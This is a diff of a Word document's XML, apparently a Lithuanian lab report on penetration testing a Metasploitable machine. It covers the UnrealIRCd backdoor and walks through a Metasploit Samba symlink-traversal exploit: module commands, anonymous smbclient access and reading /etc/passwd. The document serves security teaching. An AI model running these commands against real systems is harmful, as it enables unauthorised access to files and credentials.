-        <w:t>6667 (port)</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> prieigą naudoja UnreaIRCD IRC paslauga (daemon). Ši versija yra su backdoor (žr. </w:t>
-      </w:r>
-      <w:hyperlink r:id="rId31" w:history="1">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-            <w:lang w:val="lt-LT"/>
-          </w:rPr>
-          <w:t>http://forums.unrealircd.com/viewtopic.php?t=6562</w:t>
-        </w:r>
-      </w:hyperlink>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">). Pažeidžiamumas buvo nepastebėtas mėnesį laiko – trigeris buvo siunčiant laiškus "AB" į sistemos komandas naudojant bet kurią prieigą serveryje. Metasploit turi modulį (žr. </w:t>
-      </w:r>
-      <w:hyperlink r:id="rId32" w:history="1">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-            <w:lang w:val="lt-LT"/>
-          </w:rPr>
-          <w:t>http://www.rapid7.com/db/modules/exploit/unix/irc/unreal_ircd_3281_backdoor</w:t>
-        </w:r>
-      </w:hyperlink>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> ) išnaudoti šiam pažeidžiamumui.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:t>(galima pateikti darbalaukio atvaizdą)</w:t>
-      </w:r>
-    </w:p>
-    <w:tbl>
-      <w:tblPr>
-        <w:tblW w:w="0" w:type="auto"/>
-        <w:tblInd w:w="1" w:type="dxa"/>
-        <w:tblLayout w:type="fixed"/>
-        <w:tblCellMar>
-          <w:left w:w="0" w:type="dxa"/>
-          <w:right w:w="0" w:type="dxa"/>
-        </w:tblCellMar>
-        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
-      </w:tblPr>
-      <w:tblGrid>
-        <w:gridCol w:w="2953"/>
-        <w:gridCol w:w="6497"/>
-      </w:tblGrid>
       <w:tr>
         <w:trPr>
-          <w:trHeight w:val="368"/>
+          <w:trHeight w:val="327"/>
         </w:trPr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="2953" w:type="dxa"/>
-            <w:tcBorders>
-              <w:top w:val="single" w:sz="1" w:space="0" w:color="000000"/>
-              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
-              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
-            </w:tcBorders>
-            <w:shd w:val="clear" w:color="FFFFFF" w:fill="FFFFFF"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyText"/>
-              <w:spacing w:after="0"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:b/>
-                <w:bCs/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:b/>
-                <w:bCs/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-              <w:t>Atliktas veiksmas</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="6497" w:type="dxa"/>
-            <w:tcBorders>
-              <w:top w:val="single" w:sz="1" w:space="0" w:color="000000"/>
-              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
-              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
+            <w:tcW w:w="3420" w:type="dxa"/>
+            <w:tcBorders>
+              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
+              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+            </w:tcBorders>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="BodyText"/>
+              <w:spacing w:after="0"/>
+              <w:jc w:val="both"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="lt-LT"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="lt-LT"/>
+              </w:rPr>
+              <w:t>set LHOST 192.168.177.129</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6030" w:type="dxa"/>
+            <w:tcBorders>
+              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
+              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
               <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
             </w:tcBorders>
-            <w:shd w:val="clear" w:color="FFFFFF" w:fill="FFFFFF"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyText"/>
-              <w:spacing w:after="0"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:b/>
-                <w:bCs/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:b/>
-                <w:bCs/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-              <w:t>Rezultatas (paslaugos, prievadai)</w:t>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="BodyText"/>
+              <w:spacing w:after="0"/>
+              <w:jc w:val="both"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="lt-LT"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
+              <w:drawing>
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="48EF32CF" wp14:editId="1B7D1388">
+                  <wp:extent cx="3827780" cy="306705"/>
+                  <wp:effectExtent l="0" t="0" r="1270" b="0"/>
+                  <wp:docPr id="32" name="Picture 32"/>
+                  <wp:cNvGraphicFramePr>
+                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                  </wp:cNvGraphicFramePr>
+                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                        <pic:nvPicPr>
+                          <pic:cNvPr id="1" name=""/>
+                          <pic:cNvPicPr/>
+                        </pic:nvPicPr>
+                        <pic:blipFill>
+                          <a:blip r:embed="rId31"/>
+                          <a:stretch>
+                            <a:fillRect/>
+                          </a:stretch>
+                        </pic:blipFill>
+                        <pic:spPr>
+                          <a:xfrm>
+                            <a:off x="0" y="0"/>
+                            <a:ext cx="3827780" cy="306705"/>
+                          </a:xfrm>
+                          <a:prstGeom prst="rect">
+                            <a:avLst/>
+                          </a:prstGeom>
+                        </pic:spPr>
+                      </pic:pic>
+                    </a:graphicData>
+                  </a:graphic>
+                </wp:inline>
+              </w:drawing>
             </w:r>
           </w:p>
         </w:tc>
@@ -10959,7 +10751,7 @@
         </w:trPr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="2953" w:type="dxa"/>
+            <w:tcW w:w="3420" w:type="dxa"/>
             <w:tcBorders>
               <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
               <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
@@ -10980,13 +10772,13 @@
                 <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                 <w:lang w:val="lt-LT"/>
               </w:rPr>
-              <w:t>msfconsole</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="6497" w:type="dxa"/>
+              <w:t>exploit</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6030" w:type="dxa"/>
             <w:tcBorders>
               <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
               <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
@@ -11008,10 +10800,106 @@
                 <w:noProof/>
               </w:rPr>
               <w:drawing>
-                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2D04A505" wp14:editId="6BDBB1C2">
-                  <wp:extent cx="3895694" cy="3466238"/>
-                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
-                  <wp:docPr id="25" name="Picture 25"/>
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0E1BE0AC" wp14:editId="5E86DF9E">
+                  <wp:extent cx="3827780" cy="1525905"/>
+                  <wp:effectExtent l="0" t="0" r="1270" b="0"/>
+                  <wp:docPr id="37" name="Picture 37"/>
+                  <wp:cNvGraphicFramePr>
+                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                  </wp:cNvGraphicFramePr>
+                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                        <pic:nvPicPr>
+                          <pic:cNvPr id="1" name=""/>
+                          <pic:cNvPicPr/>
+                        </pic:nvPicPr>
+                        <pic:blipFill>
+                          <a:blip r:embed="rId32"/>
+                          <a:stretch>
+                            <a:fillRect/>
+                          </a:stretch>
+                        </pic:blipFill>
+                        <pic:spPr>
+                          <a:xfrm>
+                            <a:off x="0" y="0"/>
+                            <a:ext cx="3827780" cy="1525905"/>
+                          </a:xfrm>
+                          <a:prstGeom prst="rect">
+                            <a:avLst/>
+                          </a:prstGeom>
+                        </pic:spPr>
+                      </pic:pic>
+                    </a:graphicData>
+                  </a:graphic>
+                </wp:inline>
+              </w:drawing>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:trHeight w:val="327"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3420" w:type="dxa"/>
+            <w:tcBorders>
+              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+            </w:tcBorders>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="BodyText"/>
+              <w:spacing w:after="0"/>
+              <w:jc w:val="both"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="lt-LT"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="lt-LT"/>
+              </w:rPr>
+              <w:t>id</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6030" w:type="dxa"/>
+            <w:tcBorders>
+              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+            </w:tcBorders>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="BodyText"/>
+              <w:spacing w:after="0"/>
+              <w:jc w:val="both"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="lt-LT"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
+              <w:drawing>
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="16262B95" wp14:editId="5162BAFC">
+                  <wp:extent cx="3476625" cy="476250"/>
+                  <wp:effectExtent l="0" t="0" r="9525" b="0"/>
+                  <wp:docPr id="38" name="Picture 38"/>
                   <wp:cNvGraphicFramePr>
                     <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
                   </wp:cNvGraphicFramePr>
@@ -11031,7 +10919,7 @@
                         <pic:spPr>
                           <a:xfrm>
                             <a:off x="0" y="0"/>
-                            <a:ext cx="3924958" cy="3492276"/>
+                            <a:ext cx="3476625" cy="476250"/>
                           </a:xfrm>
                           <a:prstGeom prst="rect">
                             <a:avLst/>
@@ -11046,105 +10934,704 @@
           </w:p>
         </w:tc>
       </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+        <w:t>Samba, kai sukonfigūruotas priėjimas su rašymo galimybe ir " wide links plačiosios nuorodos" yra leidžiamas (pagal nutylėjimą).  Gali būti naudojamas kaip slaptas priėjimas prie failų, kurie nebuvo skirti dalijimuisi (share). Žemiau pavyzdyje naudojamas Metasploit modulį suteikti prieigą prie šakninės failų sistemos, naudojant anoniminį prisijungimą su įrašymo galimybę.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+        <w:t>root@linux:~#</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> smbclient -L //IP</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+        <w:t>Anonymous login successful</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+        <w:t>Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian]</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+        <w:t> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+        <w:t>        Sharename       Type      Comment</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+        <w:t>        ---------       ----      -------</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+        <w:t>        print$          Disk      Printer Drivers</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">      </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+        <w:t>  tmp             Disk      Mūsų tikslas!</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+        <w:t>        opt             Disk     </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+        <w:t>        IPC$            IPC       IPC Service (metasploitable server (Samba 3.0.20-Debian))</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>        ADMIN$          IPC       IPC Service (metasploitable server (Samba 3.0.20-Debian))</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+        <w:t>root@linux:~#</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> msfconsole</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+        <w:t>msf &gt;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> use auxiliary/admin/smb/samba_symlink_traversal</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">msf  auxiliary(samba_symlink_traversal) &gt; </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+        <w:t>set RHOST IP</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">msf  auxiliary(samba_symlink_traversal) &gt; </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+        <w:t>set SMBSHARE tmp</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">msf  auxiliary(samba_symlink_traversal) &gt; </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+        <w:t>exploit</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">msf auxiliary(samba_symlink_traversal) &gt; </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+        <w:t>exit</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+        <w:t>root@linux:~#</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> smbclient //IP/tmp</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+        <w:t>Anonymous login successful</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+        <w:t>Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian]</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">smb: \&gt; </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+        <w:t>cd rootfs</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">smb: \rootfs\&gt; </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+        <w:t>cd etc</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">smb: \rootfs\etc\&gt; </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+        <w:t>more passwd</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+        <w:t>getting file \rootfs\etc\passwd of size 1624 as /tmp/smbmore.ufiyQf (317.2 KiloBytes/sec) (average 317.2 KiloBytes/sec)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+        <w:t>root:x:0:0:root:/root:/bin/bash</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+        <w:t>daemon:x:1:1:daemon:/usr/sbin:/bin/sh</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+        <w:t>bin:x:2:2:bin:/bin:/bin/sh</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+        <w:t>[..]</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblW w:w="0" w:type="auto"/>
+        <w:tblInd w:w="1" w:type="dxa"/>
+        <w:tblLayout w:type="fixed"/>
+        <w:tblCellMar>
+          <w:left w:w="0" w:type="dxa"/>
+          <w:right w:w="0" w:type="dxa"/>
+        </w:tblCellMar>
+        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="3240"/>
+        <w:gridCol w:w="6210"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:trPr>
+          <w:trHeight w:val="368"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3240" w:type="dxa"/>
+            <w:tcBorders>
+              <w:top w:val="single" w:sz="1" w:space="0" w:color="000000"/>
+              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
+              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
+            </w:tcBorders>
+            <w:shd w:val="clear" w:color="FFFFFF" w:fill="FFFFFF"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="BodyText"/>
+              <w:spacing w:after="0"/>
+              <w:jc w:val="both"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
